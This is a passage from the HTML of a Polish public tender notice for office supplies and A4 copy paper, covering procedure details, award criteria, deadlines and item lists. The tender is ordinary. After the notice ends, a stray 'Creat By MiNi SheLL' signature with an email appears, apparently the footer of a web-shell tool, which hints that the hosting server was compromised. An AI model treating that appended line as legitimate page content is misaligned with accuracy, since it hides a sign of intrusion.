wraz z informacją o wykonawcach, którzy złożyli oferty. Wraz ze złożeniem oświadczenia,
wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą
do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. 4. Wykonawca może
w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych
sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na
zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej
innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków
prawnych. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi
udowodnić zamawiającemu, że realizując zamówienie będzie dysponował niezbędnymi
zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów
do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena ofertowa brutto</td><td>60</td></tr><tr><td>Termin wykonania zamówienia</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 07/04/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Oferta powinna być sporządzona w języku polskim.<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>CZĘŚĆ 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa do siedziby zamawiającego materiałów biurowych (materiały biurowe).

We wszystkich pozycjach, w których występuje znak towarowy, patent, pochodzenie, nazwa własna towaru lub jego producenta zamawiający dopuszcza możliwość dostawy towarów równoważnych tj. spełniających wszystkie podane w opisie parametry techniczne. W przypadkach, w których przedmiot zamówienia opisany jest za pomocą norm zamawiający dopuszcza rozwiązania równoważne. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez zamawiającego.

CZĘŚĆ 1 ZAMÓWIENIA  Materiały biurowe:
1	Długopis czarny	Długopis żelowy, przezroczysta obudowa, wkłady wymienne, grubość linii pisania - 0,27mm, końcówka wykonana z metalu, kulka wykonana z węglika wolframu, kolor tuszu: czarny.	200	szt.
2	Długopis niebieski	Długopis żelowy, przezroczysta obudowa, wkłady wymienne, grubość linii pisania - 0,27mm, końcówka wykonana z metalu, kulka wykonana z węglika wolframu , kolor tuszu: niebieski.	200	szt.
3	Długopis żelowy czerwony	Długopis z wymiennym wkładem żelowym, linia pisania 0.3 mm. Końcówka wykonana z metalu, oprawa przeźroczysta. Długość linii pisania ok. 900 m. Kolor tuszu czerwony.	30	szt.
4	Dziurkacz mały	Dziurkacz, z plastikowym ramieniem i metalową podstawą, listwą formatową i wskaźnikiem środka strony, rozstaw dziurek: 80mm, średnica otworu:                5 mm, jednorazowo dziurkuje do 20 kartek.	30	szt.
5	Dziurkacz duży	Dziurkacz z listwą formatową i wskaźnikiem środka strony, rozstaw dziurek: 80mm, średnica otworu:                       5 mm do 6 mm, jednorazowo dziurkuje do 100 kartek.	6	szt.
6	Klej Biurowy Sztyft 35g	Klej biurowy w sztyfcie, bezbarwny, bezwonny, nietoksyczny, niebrudzący, zmywalny, 2- letni okres stosowania bez utraty właściwości, pojemność minimum 35 g.	300	szt.
7	Skoroszyt A4 papierowy zawieszkowy	Skoroszyt zawieszkowy z białego kartonu o gramaturze 275 g., pełny, format A4.	500	szt.
8	Klips Archiwizacyjny	Klips archiwizacyjny, dwuczęściowy, plastikowy biały przeznaczony do archiwizacji dokumentów, umożliwia szybkie i łatwe przeniesienie dokumentów z segregatora, ułatwia korzystanie z dokumentów zarchiwizowanych w pudełkach na akta. 	4000	szt.
9	Koperta DL biała 	Koperty DL o wymiarach 110 x 220 mm, samoklejące, białe, gram. 75g/m2. 	15000	szt.
10	Koperta bąbelkowa	Koperta bąbelkowa, powietrzna 19l.	100	szt.
11	Koperta bąbelkowa	
Koperta bąbelkowa, powietrzna 17G.
	100	szt.
12	Koperta bąbelkowa	Koperta bąbelkowa, powietrzna 16F.	100	szt.
13	Koperta B5 brązowa	Koperty samoklejące, brązowe, o wymiarach 176 x 250 mm z papieru natronowego o gram. 90 g/m2. 	3000	szt.
14	Koperta bąbelkowa	Koperta bąbelkowa, powietrzna 14D.	100	szt.
15	Koperta bąbelkowa	Koperta bąbelkowa, powietrzna 18H.	100	szt.
16	Koperta B4	Koperty samoklejące B4 SK, brązowe o gram. 90 g/m2. 	3000	szt.
17	Koperta C4 brązowa	Koperty samoklejące C4 SK, brązowe, z papieru natronowego o gram. 90 g/m2. (250szt./op.).	500	szt.
18	Koperta C6 biała	Koperty C6, białe samoklejące o gram. 75g/m2. 	70000	szt.
19	Korektor w pasku	Korektor w pasku umieszczonym na specjalnej taśmie, długość taśmy: 8 m, szerokość taśmy: 5 mm, nietoksyczny, do zastosowania na wszystkich rodzajach papieru, przezroczysta obudowa pozwalająca kontrolować stan zużycia.	50	szt. 
20	Kostka biurowa klejona	Kostka papierowa z kartkami do notatek. Zawiera około 400 karteczek klejonych wzdłuż jednego boku. Wymiary: 8,5 x 8,5 cm. Kolor: biały.	100	szt.
21	Koszulka na dokumenty A4	Koszulka foliowa na dokumenty A4, krystaliczna, grubość: co najmniej 48mic.	20000	szt.
22	Linijka 30cm	Linijka 30cm, z przezroczystego polistyrenu, trwałe, nieścieralne podziałki, zaokrąglone rogi.	20	szt.
23	Marker olejowy	Marker olejowy SC-PM czarny 2mm.	10	szt.
24	Marker olejowy	Marker olejowy 0,5 mm, 780, kolor srebrny.	10	szt.
25	Marker niebieski	Marker permanentny, posiada mocną i odporną na ścieranie akrylową końcówkę, okrągłą, śr. 1,5 mm. 	120	szt.
26	Marker czarny	Marker permanentny, posiada mocną i odporną na ścieranie akrylową końcówkę, okrągłą, śr. 1,5 mm. 	120	szt.
27	Nożyczki biurowe	Nożyczki biurowe, z satynowym ostrzem ze stali nierdzewnej, ergonomicznie wyprofilowana rękojeść z niełamliwego plastiku, z ostrzem o długości                   ok. 25,5 cm.	80	szt.
28	Papier do plotera 	Papier do plotera, kolor: biały, szerokość: 841mm, gramatura 80 g/m2, nieprzezroczystość: co najmniej 93%, białość: 165 (3) CIE, bezpyłowy, spełniający wymogi standardów DIN 6723 i 6724-1 w rolkach minimum 110m, rolka na wałek o średnicy ~75mm do plotera OCE TDS 450.	5	szt.
29	Przybornik biurkowy	Przybornik na biurko wielofunkcyjny zwierający miejsce na: przybory do pisania, spinacze, kostkę biurową, formatu 90 x 90 mm, rolkę na taśmę klejącą 18mm, przezroczysty.	25	szt.
30	Taśma dwustronna	Taśma dwustronna 38 mm/5m.	10	szt.
31	Taśma klejąca piankowa	Taśma klejąca piankowa 19mm/5m dwustronna.	10	szt.
32	Skoroszyt zawieszkowy A4 plastikowy 	Skoroszyt zawieszkowy A4 miękki do przechowywania i prezentowania dokumentów. Przezroczysta przednia okładka umożliwia szybkie odszukanie odpowiedniego skoroszytu. Wykonany z folii PP. Szerokość: 226 5mm, wysokość: min 1mm, głębokość: 310  5mm.	1000	szt.
33	Spinacz biurowy 50mm 	Spinacze biurowe metalowe, rozmiar 50 mm. Pakowane w kartonowe pudełko po 100 sztuk.	300	op.
34	Spinacz biurowy 28mm 	Spinacze biurowe metalowe, małe 28 mm. Pakowane w kartonowe pudełko po 100 sztuk.	300	op.
35	Szuflada na dokumenty	Szuflada/półka na dokumenty wykonana z wytrzymałego plastiku. Półki mogą być łączone w pionie. Przezroczysta.	100	szt.
36	Taśma pakowa przezroczysta	Taśma pakowa przezroczysta wykonana z polipropylenu, pokryta emulsyjnym klejem akrylowym, wymiary: 48mm x 66m.	60	szt.
37	Taśma pakowa szara 	Taśma pakowa, szara wykonana z polipropylenu, pokryta emulsyjnym klejem akrylowym, wymiary: 48mm x 66m.	10	szt.
38	Teczka do podpisu	Książka do podpisu, na dokumenty o formacie A4, okładki z twardego kartonu pokrytego folią PP- na przedniej okładce, otwierane okienko do opisu zawartości książki, 20 przegródek wewnętrznych z 3 otworami do podglądu zawartości w każdej, rozciągliwy grzbiet typu harmonijka, kolor: czarny.	15	szt.
39	Tusz do stempli tradycyjnych czerwony	Tusz do stempli zwykłych i polimerowych, bezolejowy, pojemność: nie mniej niż 25ml, kolor: czerwony.	20	szt.
40	Tusz do stempli tradycyjnych czarny	Tusz do stempli zwykłych i polimerowych, bezolejowy, pojemność: nie mniej niż 25ml, kolor: czarny.	5	szt.
41	Zakładka indeksujaca kolorowa	Zakłada indeksująca samoprzylepna neonowa. Wymiary 4x5cm, cztery neonowe kolory w opakowaniu. Ilość zakładek minimum 4x50 sztuk w opakowaniu.	15	op.
42	Zeszyt - Brulion A4	Zeszyt A4 96 kartkowy w kratę, bez marginesu, oprawa twarda.	60	szt.
43	Zeszyt - Brulion A5	Zeszyt A5 96 kartkowy w kratę, bez marginesu, oprawa twarda.	60	szt.
44	Klip metalowy 41mm	Klip metalowy do papieru, galwanizowany, czarny. Rozmiar 41 mm.	150	szt.
45	Zakreślacz zielony	Zakreślacz fluorescencyjny, z tuszem na bazie wody, do pisania na wszystkich rodzajach papieru (również faksowym i samokopiującym), odporny na wysychanie, szerokość linii od 2 do 5 mm, kolor: zielony.	130	szt.
46	Zakreślacz żółty	Zakreślacz fluorescencyjny, z tuszem na bazie wody, do pisania na wszystkich rodzajach papieru (również faksowym i samokopiującym), odporny na wysychanie, szerokość linii od 2 do 5 mm, kolor: żółty.	130	szt.
47	Blok biurowy/listowy A4	Blok szkolny w kratkę. Klejony u góry, 50 kartek, kolor biały. Format A4.	100	szt.
48	Zszywacz duży	Zszywacz długoramienny, zszywa jednorazowo do 200 arkuszy papieru 80g, możliwość zastosowania zszywek o rożnych rozmiarach, solidna metalowa podstawa i metalowe ramię, z podstawką antypoślizgową. Zszywanie otwarte i zamknięte - łatwe do zmiany poprzez przekręcenie metalowej stopki.	7	szt.
49	Holder z klipsem	Holder z klipsem przezroczysty, z polipropylenu, 86 x 54 mm, na 1 kartę plastikową z nalepką (ok. 1 mm grubości), klips CT 211.	300	szt.
50	Zszywacz mały	Zszywacz biurowy, minimum na zszywki 24/6 i 26/6. Wykonany z plastiku, części mechaniczne z metalu. Antypoślizgowa plastikowa podstawka zabezpiecza przed rysowaniem mebli. Zszywa do 25 kartek (papier 80 g). Zszywanie otwarte i zamknięte - łatwe do zmiany poprzez przekręcenie metalowej stopki. Blokada zabezpieczająca przed zamknięciem zszywacza.	80	szt.
51	Zszywki 23/10 	Zszywki miedziowane do zszywaczy 23/10, opakowanie: 1000 szt.	30	op.
52	Zszywki 23/17 	Zszywki miedziowane do zszywaczy klasy 23/17, opakowanie: 1000 szt.	30	op.
53	Zszywki 24/6 	Zszywki miedziowane do zszywaczy klasy 24/6, opakowanie: 1000 szt.	500	op.


Termin wykonania CZĘŚĆ 1 ZAMÓWIENIA - nie dłużej niż 14 dni kalendarzowych od dnia zawarcia umowy.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30190000-7, 30192121-5,
                    30197330-8,
                    24910000-6,
                    22851000-0,
                    30192000-1,
                    30199230-1,
                    30192160-0,
                    22816100-4,
                    30237430-2,
                    39241200-5,
                    30193200-0,
                    44424200-0,
                    30197220-4,
                    22600000-6,
                    22816300-6,
                    22800000-8,
                    30192125-3,
                    22816000-3,
                    30197320-5,
                    30197100-7,
                    39292500-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena ofertowa brutto</td><td>60</td></tr><tr><td>Termin wykonania zamówienia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>CZĘŚĆ 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa do siedziby zamawiającego materiałów biurowych (papier ksero A4).

We wszystkich pozycjach, w których występuje znak towarowy, patent, pochodzenie, nazwa własna towaru lub jego producenta zamawiający dopuszcza możliwość dostawy towarów równoważnych tj. spełniających wszystkie podane w opisie parametry techniczne. W przypadkach, w których przedmiot zamówienia opisany jest za pomocą norm zamawiający dopuszcza rozwiązania równoważne. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez zamawiającego.


CZĘŚĆ 2 ZAMÓWIENIA  Papier ksero A4 biały, Gramatura (g/m): 80, Białość (CIE): min 140, nieprzezroczystość (%): 94 +2/-1 , Grubość (m): 1083 , Gładkość: 18050,              (ryza/500 akr.)	2500	ryz.


Termin wykonania CZĘŚĆ 2 ZAMÓWIENIA - nie dłużej niż 14 dni kalendarzowych od dnia zawarcia umowy.

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30197642-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena ofertowa brutto</td><td>60</td></tr><tr><td>Termin wykonania zamówienia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com